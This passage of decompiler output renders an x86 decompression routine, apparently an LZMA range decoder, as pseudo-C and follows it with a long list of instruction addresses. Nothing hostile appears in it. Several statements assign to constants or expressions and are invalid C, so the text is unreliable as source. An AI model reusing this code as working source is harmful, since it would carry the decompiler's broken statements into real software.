											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__ebx = __edx + 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                      0x00000000
                                                                      0x00406f10
                                                                      0x00406f10
                                                                      0x00406f14
                                                                      0x00406f39
                                                                      0x00406f43
                                                                      0x00000000
                                                                      0x00406f16
                                                                      0x00406f16
                                                                      0x00406f19
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f23
                                                                      0x00406f27
                                                                      0x00406f27
                                                                      0x00406f2a
                                                                      0x00407004
                                                                      0x00407004
                                                                      0x0040700b
                                                                      0x0040700b
                                                                      0x0040700e
                                                                      0x00407015
                                                                      0x00407042
                                                                      0x00407046
                                                                      0x004070a6
                                                                      0x004070a9
                                                                      0x004070ae
                                                                      0x004070af
                                                                      0x004070b1
                                                                      0x004070b3
                                                                      0x004070b6
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x00406767
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00000000
                                                                      0x00406778
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406781
                                                                      0x00406784
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406791
                                                                      0x00406794
                                                                      0x00406796
                                                                      0x00406797
                                                                      0x0040679a
                                                                      0x0040679c
                                                                      0x0040679d
                                                                      0x0040679f
                                                                      0x004067a2
                                                                      0x004067a7
                                                                      0x004067ac
                                                                      0x004067b5
                                                                      0x004067c8
                                                                      0x004067cb
                                                                      0x004067d7
                                                                      0x004067ff
                                                                      0x00406801
                                                                      0x0040680f
                                                                      0x0040680f
                                                                      0x00406813
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x00406803
                                                                      0x00406806
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x004067dd
                                                                      0x004067e2
                                                                      0x004067e2
                                                                      0x004067eb
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x00406819
                                                                      0x00406819
                                                                      0x0040681d
                                                                      0x004070c9
                                                                      0x00000000
                                                                      0x004070c9
                                                                      0x00406826
                                                                      0x00406836
                                                                      0x00406839
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683f
                                                                      0x00406843
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406845
                                                                      0x0040684b
                                                                      0x00406875
                                                                      0x0040687b
                                                                      0x00406882
                                                                      0x00000000
                                                                      0x00406882
                                                                      0x00406851
                                                                      0x00406854
                                                                      0x00406859
                                                                      0x00406859
                                                                      0x00406864
                                                                      0x0040686c
                                                                      0x0040686f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068b4
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068ca
                                                                      0x004068d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406889
                                                                      0x00406889
                                                                      0x0040688d
                                                                      0x004070d8
                                                                      0x00000000
                                                                      0x004070d8
